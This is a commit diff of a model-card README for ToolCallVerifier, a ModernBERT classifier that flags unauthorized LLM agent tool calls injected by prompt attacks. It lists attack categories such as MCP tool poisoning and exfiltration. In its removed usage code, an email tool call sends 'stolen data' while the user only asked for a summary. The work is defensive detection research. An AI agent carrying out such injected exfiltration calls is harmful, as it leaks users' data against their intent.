Xunzhuo commited on
Commit
48c3fec
Β·
verified Β·
1 Parent(s): f9c8f39

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +2 -120
README.md CHANGED
@@ -20,7 +20,7 @@ datasets:
20
  base_model: answerdotai/ModernBERT-base
21
  pipeline_tag: token-classification
22
  model-index:
23
- - name: tool-call-verifier
24
  results:
25
  - task:
26
  type: token-classification
@@ -46,7 +46,6 @@ model-index:
46
 
47
  [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
48
  [![Model](https://img.shields.io/badge/πŸ€—-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
49
- [![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
50
 
51
  **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
52
 
@@ -65,54 +64,6 @@ ToolCallVerifier is a **ModernBERT-based token classifier** that detects unautho
65
 
66
  ---
67
 
68
- ## πŸ“Š Performance
69
-
70
- | Metric | Value |
71
- |--------|-------|
72
- | **UNAUTHORIZED F1** | **93.50%** |
73
- | UNAUTHORIZED Precision | 95.01% |
74
- | UNAUTHORIZED Recall | 92.05% |
75
- | Overall Accuracy | 92.88% |
76
-
77
- ### Confusion Matrix (Token-Level)
78
-
79
- ```
80
- Predicted
81
- AUTH UNAUTH
82
- Actual AUTH 130,708 8,483
83
- UNAUTH 13,924 161,031
84
- ```
85
-
86
- ---
87
-
88
- ## πŸ—‚οΈ Training Data
89
-
90
- Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
91
-
92
- ### HuggingFace Datasets
93
-
94
- | Dataset | Description | Samples |
95
- |---------|-------------|---------|
96
- | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
97
- | [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
98
- | [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
99
- | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
100
-
101
- ### Synthetic Attack Generators
102
-
103
- | Generator | Description |
104
- |-----------|-------------|
105
- | Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
106
- | Filesystem | File/directory operation attacks |
107
- | Network | Network/API exfiltration attacks |
108
- | Email | Email tool hijacking |
109
- | Financial | Transaction manipulation |
110
- | Code Execution | Code injection attacks |
111
- | Authentication | Access control bypass |
112
- | MCP Attacks | Tool poisoning, shadowing, rug pulls |
113
-
114
- ---
115
-
116
  ## 🚨 Attack Categories Covered
117
 
118
  | Category | Source | Description |
@@ -127,60 +78,6 @@ Trained on **~30,000 samples** combining real-world attacks and synthetic patter
127
  | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
128
  | MCP Shadowing | Synthetic | Fake authorization context |
129
 
130
- ---
131
-
132
- ## πŸ’» Usage
133
-
134
- ```python
135
- from transformers import AutoTokenizer, AutoModelForTokenClassification
136
- import torch
137
-
138
- model_name = "rootfs/tool-call-verifier"
139
- tokenizer = AutoTokenizer.from_pretrained(model_name)
140
- model = AutoModelForTokenClassification.from_pretrained(model_name)
141
-
142
- # Example: Verify a tool call
143
- user_intent = "Summarize my emails"
144
- tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
145
-
146
- # Combine for classification
147
- input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
148
- inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
149
-
150
- with torch.no_grad():
151
- outputs = model(**inputs)
152
- predictions = torch.argmax(outputs.logits, dim=-1)
153
-
154
- id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
155
- tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
156
- labels = [id2label[p.item()] for p in predictions[0]]
157
-
158
- # Check for unauthorized tokens
159
- unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
160
- if unauthorized_tokens:
161
- print("⚠️ BLOCKED: Unauthorized tool call detected!")
162
- print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
163
- else:
164
- print("βœ… Tool call authorized")
165
- ```
166
-
167
- ---
168
-
169
- ## βš™οΈ Training Configuration
170
-
171
- | Parameter | Value |
172
- |-----------|-------|
173
- | Base Model | `answerdotai/ModernBERT-base` |
174
- | Max Length | 512 tokens |
175
- | Batch Size | 32 |
176
- | Epochs | 5 |
177
- | Learning Rate | 3e-5 |
178
- | Loss | CrossEntropyLoss (class-weighted) |
179
- | Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
180
- | Attention | SDPA (Flash Attention) |
181
- | Hardware | AMD Instinct MI300X (ROCm) |
182
-
183
- ---
184
 
185
  ## πŸ”— Integration with FunctionCallSentinel
186
 
@@ -188,7 +85,7 @@ This model is **Stage 2** of a two-stage defense pipeline:
188
 
189
  ```
190
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
191
- β”‚ User Prompt │────▢│ FunctionCallSentinel │────▢│ LLM + Tools β”‚
192
  β”‚ β”‚ β”‚ (Stage 1) β”‚ β”‚ β”‚
193
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜
194
  β”‚
@@ -220,23 +117,8 @@ This model is **Stage 2** of a two-stage defense pipeline:
220
  - Non-tool-calling scenarios
221
  - Languages other than English
222
 
223
- ---
224
-
225
- ## ⚠️ Limitations
226
-
227
- 1. **Tool schema dependent** β€” Best performance when tool schema is included in input
228
- 2. **English only** β€” Not tested on other languages
229
- 3. **Binary classification** β€” No "suspicious" intermediate category (by design, for decisiveness)
230
-
231
- ---
232
 
233
  ## πŸ“œ License
234
 
235
  Apache 2.0
236
 
237
- ---
238
-
239
- ## πŸ”— Links
240
-
241
- - **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)
242
-
 
20
  base_model: answerdotai/ModernBERT-base
21
  pipeline_tag: token-classification
22
  model-index:
23
+ - name: toolcall-verifier
24
  results:
25
  - task:
26
  type: token-classification
 
46
 
47
  [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
48
  [![Model](https://img.shields.io/badge/πŸ€—-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
 
49
 
50
  **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
51
 
 
64
 
65
  ---
66
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
67
  ## 🚨 Attack Categories Covered
68
 
69
  | Category | Source | Description |
 
78
  | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
79
  | MCP Shadowing | Synthetic | Fake authorization context |
80
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
81
 
82
  ## πŸ”— Integration with FunctionCallSentinel
83
 
 
85
 
86
  ```
87
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
88
+ β”‚ User Prompt │────▢│ ToolCallSentinel │────▢│ LLM + Tools β”‚
89
  β”‚ β”‚ β”‚ (Stage 1) β”‚ β”‚ β”‚
90
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜
91
  β”‚
 
117
  - Non-tool-calling scenarios
118
  - Languages other than English
119
 
 
 
 
 
 
 
 
 
 
120
 
121
  ## πŸ“œ License
122
 
123
  Apache 2.0
124